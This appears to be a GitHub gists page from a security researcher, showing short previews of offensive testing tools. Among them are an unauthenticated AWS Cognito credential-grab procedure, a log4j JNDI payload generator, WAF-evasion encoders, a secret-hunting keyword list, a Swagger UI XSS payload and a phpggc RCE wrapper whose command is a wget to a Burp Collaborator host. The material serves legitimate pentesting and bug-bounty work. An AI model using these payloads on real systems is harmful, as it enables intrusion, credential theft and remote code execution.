-
Generate temporary AWS credentials using unauth user 1.1 - Get the poolId 2.1 - IdendityID 3.1 - Use the following command on aws-cli "example" $ aws cognito-identity get-id --identity-pool-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"
3.2 - Use the following command to get aws credentials $ aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"
【incogbyte】 incogbyte
🐀
incogbyte
/ shai-hulud-npm-supply-chain-attack.bambda
Last active
September 17, 2025 15:58
shai hulud npm supply chain attack Bambda burp filter,
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Author: @incogbyte | |
| // Blog Post: https://www.wiz.io/blog/shai-hulud-npm-supply-chain-attack | |
| // Usage: Proxy > HTTP history > Filter > "Script mode" > paste > Apply. | |
| if (!requestResponse.hasResponse()) { | |
| return false; | |
| } | |
| var req = requestResponse.request(); | |
| var resp = requestResponse.response(); |
incogbyte
/ log4j_payloads_waf.py
Created
September 15, 2025 14:23
A tool to generate log4j payloads for JNDI injection for testing WAFs.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| A tool to generate log4j payloads for JNDI injection for testing WAFs. | |
| Author: incogbyte | |
| """ | |
| import random | |
| import string | |
| import argparse |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| RED='\033[0;31m' | |
| GREEN='\033[0;32m' | |
| YELLOW='\033[1;33m' | |
| BLUE='\033[0;34m' | |
| NC='\033[0m' | |
| WORK_DIR="./apk_extractor_temp" | |
| OUTPUT_DIR="./ExtractedAPKs" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .mlab.com+password | |
| WFClient+Password+extension:ica | |
| access_key | |
| access_token | |
| admin_pass | |
| admin_user | |
| algolia_admin_key | |
| algolia_api_key | |
| alias_pass | |
| alicloud_access_key |
incogbyte
/ capture.html
Last active
July 3, 2025 12:17
Cam + Mic Capture Demo - Camera and Microphone Spy Chromium Browsers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8" /> | |
| <title>Cam + Mic Capture Demo</title> | |
| <style> | |
| body { font-family: system-ui, sans-serif; padding: 1rem; } | |
| #video { max-width: 350px; border-radius: 8px; background: #000; } | |
| #controls { margin-top: 1rem; } | |
| button { padding: .6rem 1rem; margin-right: .5rem; } |
incogbyte
/ encoding_waf_evasion.py
Created
January 27, 2025 11:28
Python script that generates diff encodings techniques. Those techniques can be used to bypass HTTP WAF.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib.parse | |
| """ | |
| By @incogbyte | |
| Python script that generates diff encodings techniques. | |
| Those techniques can be used to bypass HTTP WAF. | |
| """ | |
| def generate_encodings(input_string): | |
| encodings = {} |
incogbyte
/ swagger-xss.yaml
Last active
November 8, 2023 12:59
https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Classic API Resource Documentation | |
| description: | | |
| <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form> | |
| version: production | |
| basePath: /JSSResource/ | |
| produces: | |
| - application/xml |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Git clone this tool https://github.com/ambionics/phpggc | |
| # phpggc wrapper that automatically generates payloads for RCE gadgets | |
| function="system" | |
| command="wget http://your.burpcollaborator.net/?" | |
| # modify the options below depending on your use case | |
| options="-a -b -u -f" |
incogbyte
/ words_from_subs.py
Created
June 7, 2023 12:24
extract words from subdomains to make a wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| import sys | |
| def extract_subdomains(filename): | |
| subdomains = set() | |
| pattern = r"(?:https?://)?(?:www\.)?([^.]+\.[^.]+)" | |
| with open(filename, 'r') as file: | |
| for line in file: | |
| match = re.search(pattern, line) |
NewerOlder